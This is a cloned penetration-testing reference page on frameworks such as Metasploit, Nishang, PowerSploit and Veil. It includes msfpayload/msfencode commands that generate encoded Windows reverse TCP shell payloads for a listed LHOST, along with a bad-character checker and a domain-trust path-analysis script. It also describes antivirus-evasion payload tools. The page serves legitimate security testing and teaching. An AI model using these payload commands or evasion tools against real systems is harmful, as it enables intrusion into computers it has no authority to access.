Clone of https://github.com/rmusser01/Infosec_Reference . For those who would prefer to not be tracked by MS.
##Frameworks and Methodologies of all kinds!

* PTES (Penetration Testing Execution Standard)
* OSSTMM (Open Source Security Testing Methodology Manual)

Metasploit Framework

What is Metasploit?

This website should eventually be your go-to reference for Metasploit: https://metasploit.github.io/

  • It is the official “reference” page for the metasploit framework

Facts and Myths about AV Evasion with the Metasploit Framework

MSF/Meterpreter cmd reference

http://it-ovid.blogspot.com/2012/02/metasploit-and-meterpreter.html

Metasploit Framework - Payload Encoding

Note: `msfpayload` and `msfencode` were removed from the framework in 2015; `msfvenom` replaces both (`msfvenom -l payloads` to list payloads, `msfvenom -p <payload> LHOST=... -e x86/shikata_ga_nai -b '\x00\x0a\x0b\x0d\x90' -f c` for the encoding step). The commands below are kept in the original syntax; `R` tells msfpayload to emit raw bytes for piping into the encoder.

List all available payloads and search for Windows reverse TCP shells:

```bash
msfpayload -l | grep windows | grep shell | grep reverse | grep tcp
```

List available encoders:

```bash
msfencode -l
```

Reverse self-contained (not staged) command shell, 341 bytes, encoded with shikata_ga_nai, avoiding the bad characters `\x00 \x0a \x0b \x0d \x90`, output as a C array:

```bash
msfpayload windows/shell_reverse_tcp LHOST=192.168.6.1 R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0b\x0d\x90' -t c
```

Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7). Use `exploit/multi/handler` in msf to listen; when the stager connects back, the handler uploads the remainder of the shellcode (stage 2):

```bash
msfpayload windows/shell/reverse_ord_tcp LHOST=192.168.6.1 R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0b\x0d\x90' -t c
```

Generic syntax:

```bash
msfpayload <payload> <option>=<value> ... R | ./msfencode -e <encoder> -b '<badchars>' -t <format>
```
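The `-b` list above only asks the encoder to avoid those bytes; before dropping the blob into an exploit it is worth verifying that the C dump really contains none of them. The following is an added example (not Metasploit's own code) that parses the `unsigned char buf[] = "\x..";` format printed by `msfencode -t c` (and `msfvenom -f c`) and checks it against a `-b` string. The two dumps are constructed for the illustration and are not working shellcode; the second one deliberately contains a `0x0a` to show a failed check.

```python
"""Sanity check for encoder output: verify that a -t c / -f c dump
contains none of the bytes passed to the encoder as bad characters."""
import re

# One \xNN escape; used both for the -b argument and for the C string literals.
HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')

# Constructed sample in the shape msfencode -t c / msfvenom -f c print.
# The bytes are made up for this example and are not real shellcode.
CLEAN_OUTPUT = r'''
unsigned char buf[] = 
"\xda\xc1\xd9\x74\x24\xf4\x5e\x33\xc9\xb1\x0c"
"\x31\x46\x17\x83\xc6\x04\x03\x46\x13\x6a";
'''

# Same dump, but with a 0x0a (newline) left in the blob, as happens when the
# encoder is run without -b or the bad-char list was incomplete.
DIRTY_OUTPUT = r'''
unsigned char buf[] = 
"\xda\xc1\xd9\x74\x24\xf4\x5e\x33\xc9\xb1\x0c"
"\x31\x46\x17\x83\xc6\x0a\x03\x46\x13\x6a";
'''

BADCHARS_ARG = r'\x00\x0a\x0b\x0d\x90'   # the -b argument used on this page


def parse_hex_escapes(spec):
    """Turn a run of \\xNN escapes into bytes."""
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(spec))


def parse_c_buffer(text):
    """Extract the bytes from an `unsigned char buf[] = "...";` dump.
    Only the quoted string literals are read, so a size comment such as
    '/* 341 bytes */' cannot pollute the result."""
    literals = re.findall(r'"((?:\\x[0-9a-fA-F]{2})*)"', text)
    return b"".join(parse_hex_escapes(lit) for lit in literals)


def find_badchars(blob, badchars):
    """Return [(offset, byte)] for every bad character present in the blob."""
    return [(i, b) for i, b in enumerate(blob) if b in badchars]


def check_encoded_output(text, badchars_arg):
    """Parse a C dump and report its size and any bad-character hits."""
    blob = parse_c_buffer(text)
    hits = find_badchars(blob, parse_hex_escapes(badchars_arg))
    return {"size": len(blob), "hits": hits, "clean": not hits}


if __name__ == "__main__":
    for name, dump in (("clean", CLEAN_OUTPUT), ("dirty", DIRTY_OUTPUT)):
        print(name, check_encoded_output(dump, BADCHARS_ARG))
```

Feed it the real encoder output (saved to a file, or pasted as the string) together with the same `-b` argument you gave the encoder; a non-empty `hits` list means the decoder stub or the encoded body still carries a byte the target's input path will mangle, and the encoder should be re-run with a different seed or encoder.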

Contributing to Metasploit

* Writing an Exploit
* Writing an Exploit for Metasploit by Corelan
* Writing an Auxiliary module
* Writing a Post-Exploitation module
* Style tips for writing a Metasploit module

Metasploit Framework Module Github

###Nishang Framework

Nishang is a framework and collection of scripts and payloads that enables the use of PowerShell for offensive security and during penetration tests. Nishang is useful during various phases of a penetration test and is most powerful for post-exploitation usage. It was made by https://twitter.com/nikhil_mitt

###PowerSploit Framework

Github

Windows exploitation framework composed of Powershell modules

###Veil Framework

Veil-Evasion
* Veil-Evasion is a tool to generate payload executables that bypass common antivirus solutions.

Veil-Ordnance
* Veil-Ordnance is a tool that can be used to quickly generate valid stager shellcode.

Veil-Framework

Veil-Catapult
* Veil-Catapult is a payload delivery tool that integrates with Veil-Evasion for payload generation.
* Github

Veil-Pillage
* Veil-Pillage is a modular post-exploitation framework that integrates with Veil-Evasion for payload generation.

Veil-PowerView
* Veil-PowerView is a PowerShell tool to gain network situational awareness on Windows domains. Veil-PowerView's code is on Github.

DomainTrustExplorer
* Python script for analysis of the "Trust.csv" file generated by Veil-PowerView. Provides graph-based analysis and output. The graph output represents access direction, which is the opposite of trust direction: an edge from domain A to domain B means principals in A can be granted access to resources in B, because B trusts A.
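To make the "access direction is the opposite of trust direction" point concrete, here is an added example (not DomainTrustExplorer's or PowerView's own code) that reads a Trust.csv, builds the access graph by reversing each trust edge, and walks it to find which domains a principal can reach. The column names `SourceDomain`, `TargetDomain`, `TrustType`, `TrustDirection`, the set of trust types treated as transitive, and the sample rows are assumptions made for this example; real forests add selective authentication and SID filtering on top of what is modelled here.

```python
"""Build an access graph from a PowerView-style Trust.csv and query it."""
import csv
import io
from collections import defaultdict, deque

# Constructed sample in the shape assumed for PowerView's trust export.
# Column names and rows are made up for this example.
TRUST_CSV = """SourceDomain,TargetDomain,TrustType,TrustDirection
corp.local,dev.corp.local,ParentChild,Bidirectional
corp.local,partner.example,External,Outbound
dev.corp.local,lab.example,External,Inbound
"""

# Assumed: intra-forest and forest trusts chain, external trusts do not.
TRANSITIVE_TYPES = {"ParentChild", "TreeRoot", "Forest", "Shortcut"}


def access_edges(csv_text):
    """Return {domain: {(reachable_domain, transitive), ...}}.

    An access edge X -> Y means principals from X can be granted access to
    resources in Y. That is the reverse of the trust: "Outbound" on a row
    means SourceDomain trusts TargetDomain, so TargetDomain's principals can
    reach SourceDomain; "Inbound" is the other way round."""
    access = defaultdict(set)
    for row in csv.DictReader(io.StringIO(csv_text)):
        src, dst = row["SourceDomain"], row["TargetDomain"]
        transitive = row["TrustType"] in TRANSITIVE_TYPES
        direction = row["TrustDirection"]
        if direction in ("Outbound", "Bidirectional"):
            access[dst].add((src, transitive))   # src trusts dst
        if direction in ("Inbound", "Bidirectional"):
            access[src].add((dst, transitive))   # dst trusts src
    return access


def reachable_from(access, start):
    """Domains whose resources a principal in `start` can reach.

    A non-transitive trust only admits principals from the directly trusted
    domain, so such an edge may only be the first hop, and nothing is
    followed beyond it."""
    seen = set()
    queue = deque([start])
    while queue:
        domain = queue.popleft()
        for nxt, transitive in access.get(domain, ()):
            if nxt == start or nxt in seen:
                continue
            if domain != start and not transitive:
                continue  # non-transitive trust cannot be a later hop
            seen.add(nxt)
            if transitive:
                queue.append(nxt)
    return seen


def to_dot(access):
    """Graphviz DOT of the access graph; dashed edges are non-transitive."""
    lines = ["digraph access {"]
    for src in sorted(access):
        for dst, transitive in sorted(access[src]):
            style = "solid" if transitive else "dashed"
            lines.append(f'  "{src}" -> "{dst}" [style={style}];')
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    graph = access_edges(TRUST_CSV)
    for domain in ("partner.example", "corp.local", "dev.corp.local", "lab.example"):
        print(domain, "->", sorted(reachable_from(graph, domain)))
    print(to_dot(graph))
```

With the sample rows, a principal from `partner.example` reaches `corp.local` only: the external trust is non-transitive, so the parent-child trust between `corp.local` and `dev.corp.local` does not extend it. Reading the graph in this direction is what makes trust abuse paths visible; the raw trust direction reads backwards for that purpose.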

Veil Tutorials:

More videos: https://www.veil-framework.com/guidesvideos/

Talks on Veil

Adventures in Asymmetric Warfare by Will Schroeder